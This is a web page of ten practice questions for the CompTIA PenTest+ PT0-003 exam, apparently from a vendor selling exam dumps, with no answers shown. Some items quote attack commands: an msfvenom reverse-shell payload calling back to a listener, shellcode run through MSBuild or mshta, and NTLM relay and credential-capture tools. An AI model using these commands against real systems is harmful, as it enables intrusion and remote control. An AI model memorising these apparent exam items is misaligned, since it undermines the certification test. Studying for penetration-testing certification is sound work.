CompTIA PT0-003 CompTIA PenTest+ Exam Online Training
CompTIA PT0-003 Online Training
The questions for PT0-003 were last updated at Feb 20,2025.
- Exam Code: PT0-003
- Exam Name: CompTIA PenTest+ Exam
- Certification Provider: CompTIA
- Latest update: Feb 20,2025
During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine.
Which of the following tools should the penetration tester use to continue the attack?
- A . Responder
- B . Hydra
- C . BloodHound
- D . CrackMapExec
A penetration tester needs to collect information over the network for further steps in an internal assessment.
Which of the following would most likely accomplish this goal?
- A . ntlmrelayx.py -t 192.168.1.0/24 -1 1234
- B . nc -tulpn 1234 192.168.1.2
- C . responder.py -I eth0 -wP
- D . crackmapexec smb 192.168.1.0/24
A penetration tester wants to use the following Bash script to identify active servers on a network:
1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done
Which of the following should the tester do to modify the script?
- A . Change the condition on line 4.
- B . Add 2>&1 at the end of line 3.
- C . Use seq on the loop on line 2.
- D . Replace $h with ${h} on line 3.
A penetration tester is attempting to discover vulnerabilities in a company’s web application.
Which of the following tools would most likely assist with testing the security of the web application?
- A . OpenVAS
- B . Nessus
- C . sqlmap
- D . Nikto
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services.
Which of the following commands should the tester use?
- A . nmap -sU -sW -p 1-65535 example.com
- B . nmap -sU -sY -p 1-65535 example.com
- C . nmap -sU -sT -p 1-65535 example.com
- D . nmap -sU -sN -p 1-65535 example.com
A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
- A . regsvr32 /s /n /u C:evil.xml
- B . MSBuild.exe C:evil.xml
- C . mshta.exe C:evil.xml
- D . AppInstaller.exe C:evil.xml
A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering.
Which of the following types of scans did the tester use to identify the libraries?
- A . IAST
- B . SBOM
- C . DAST
- D . SAST
A penetration tester performs an assessment on the target company’s Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?
- A . Network configuration errors in Kubernetes services
- B . Weaknesses and misconfigurations in the Kubernetes cluster
- C . Application deployment issues in Kubernetes
- D . Security vulnerabilities specific to Docker containers
A penetration tester needs to confirm the version number of a client’s web application server.
Which of the following techniques should the penetration tester use?
- A . SSL certificate inspection
- B . URL spidering
- C . Banner grabbing
- D . Directory brute forcing
Given the following statements:
Implement a web application firewall.
Upgrade end-of-life operating systems.
Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be found?
- A . Executive summary
- B . Attack narrative
- C . Detailed findings
- D . Recommendations
Latest PT0-003 Dumps Valid Version with 131 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund
